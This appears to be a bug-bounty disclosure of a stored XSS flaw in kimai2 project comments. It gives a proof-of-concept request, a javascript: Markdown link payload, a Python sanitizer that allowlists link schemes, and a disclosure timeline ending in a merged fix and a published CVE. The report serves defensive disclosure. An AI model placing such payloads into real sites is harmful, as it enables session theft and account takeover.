Cross-site Scripting (XSS) - Stored in kevinpapst/kimai2


Reported on Nov 16th 2021


Stored XSS via Markdown in the comment of a Project

Proof of Concept

// PoC.req
POST /kimai2/public/en/admin/project/3/comment_add HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 159
Connection: close
Cookie: PHPSESSID=j5phlsvo13ou7dqv96ibtabq9o
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1


Steps to Reproduce

Create a new project and, in the comment section, input the payload: [XSS](javascript:alert(`XSS`))

The XSS will trigger when a user clicks on the content of the comment.


This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.
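
One way to close this class of bug is to allowlist the URL scheme of every Markdown link destination before it is rendered as an anchor. The sketch below is an added example, not Kimai's code or the merged fix; the names ALLOWED_SCHEMES, is_safe_href and render_comment and the simplified link regex are assumptions made for illustration.

```python
import re
from html import escape

# Assumption: schemes a comment link may use; everything else is rejected.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# Simplified inline link matcher, [label](destination), allowing one level of
# balanced parentheses in the destination. Not a full CommonMark parser.
LINK_RE = re.compile(r"\[([^\]]*)\]\(((?:[^()\s]|\([^()\s]*\))*)\)")

# Characters 0x00-0x20: browsers ignore these at either end of a URL.
_C0_AND_SPACE = "".join(map(chr, range(0x21)))


def is_safe_href(url: str) -> bool:
    """Allow relative references and allowlisted schemes only."""
    # Normalise the way a browser does before it reads the scheme:
    # trim C0 controls/space, drop tab and newline characters anywhere.
    cleaned = re.sub(r"[\t\n\r]", "", url.strip(_C0_AND_SPACE))
    # A scheme can only appear before the first "/", "?" or "#".
    head = re.split(r"[/?#]", cleaned, maxsplit=1)[0]
    if ":" not in head:
        return True  # relative reference, no scheme present
    return head.split(":", 1)[0].lower() in ALLOWED_SCHEMES


def render_comment(markdown: str) -> str:
    """Escape a comment and turn only safe Markdown links into anchors."""
    out, pos = [], 0
    for m in LINK_RE.finditer(markdown):
        out.append(escape(markdown[pos:m.start()]))
        label, href = m.group(1), m.group(2)
        if is_safe_href(href):
            out.append(f'<a href="{escape(href)}" rel="noopener noreferrer">'
                       f"{escape(label)}</a>")
        else:
            out.append(escape(label))  # keep the label, drop the link
        pos = m.end()
    out.append(escape(markdown[pos:]))
    return "".join(out)


if __name__ == "__main__":
    reported = "[XSS](javascript:alert(`XSS`))"  # payload from the report
    benign = "[docs](https://example.org/a?b=1&c=2)"  # constructed sample
    print(render_comment(reported))
    print(render_comment(benign))
```

An allowlist is used rather than a check for the string "javascript:" because the scheme comparison has to survive case changes and the whitespace a browser discards while parsing a URL.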

We are processing your report and will contact the kevinpapst/kimai2 team within 24 hours. 18 days ago
lethanhphuc modified their report
18 days ago
lethanhphuc modified their report
18 days ago
We have contacted a member of the kevinpapst/kimai2 team and are waiting to hear back 17 days ago
lethanhphuc submitted a
15 days ago



Kevin Papst validated this vulnerability 15 days ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Kevin Papst confirmed that a fix has been merged on 76e094 15 days ago
Kevin Papst has been awarded the fix bounty
Jamie Slome
3 days ago


CVE published! 🎊